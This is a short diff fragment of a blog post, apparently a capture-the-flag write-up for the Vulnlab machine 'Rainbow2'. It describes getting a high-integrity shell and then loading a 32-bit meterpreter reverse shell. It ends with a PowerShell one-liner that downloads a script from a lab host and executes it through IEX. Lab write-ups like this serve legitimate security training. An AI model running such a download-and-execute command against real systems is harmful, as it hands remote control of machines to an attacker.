dplastico/dplastico.github.io/_posts/2023-07-02-2023-write_up-Rainbow2-(Vulnlab).md

 ```
 We can observe we have a high-integrity shell, and we are part of NT AUTHORITY.
 So after all that ropping, I went the easy way and first called a PowerShell reverse_shell and generate a 32-bit meterpreter shell  (remember, we are running on an x86 process).

-We then can host the shell in a Python web server and execute PowerShell in pour shell and download and execute the meterpreter reverse shell with
+We then can host the shell in a Python web server and execute PowerShell in our shell and download and execute the meterpreter reverse shell with the followign command

 ```
 (new-object system.net.webclient).DownloadString('http://10.8.0.138/dplashell.txt') | IEX